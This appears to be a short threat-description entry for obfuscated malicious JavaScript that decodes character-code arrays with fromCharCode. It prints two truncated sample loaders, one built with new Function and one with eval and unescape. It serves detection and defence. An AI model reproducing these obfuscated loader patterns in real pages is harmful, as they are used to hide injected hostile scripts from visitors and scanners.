Description:
Scripts that use arrays of character codes (decoded via the fromCharCode function) to obfuscate malicious content. This may be not he only leyer of obfuscation.
Typical samples
Sample 1
(new Function(String.fromCharCode(19 - 9, 126 - 8, 100 - 3, 122 - 8, 37 - 5, ...skipped...,45 - 4, 68 - 9, 14 - 4, 16 - 6)))();
Sample 2
var x="'%kVg'%YZaVn'%(9'%&%%(7%...skipped...%YZaVn'.(7",y="",w="",z;z=x['length'];for(i=0;i<z;i++){y+=String['fromCharCode'](x['charCodeAt'](i)+11) }w=this['unescape'](y);this['eval'](w);
Affecting: Any web site (no specific target).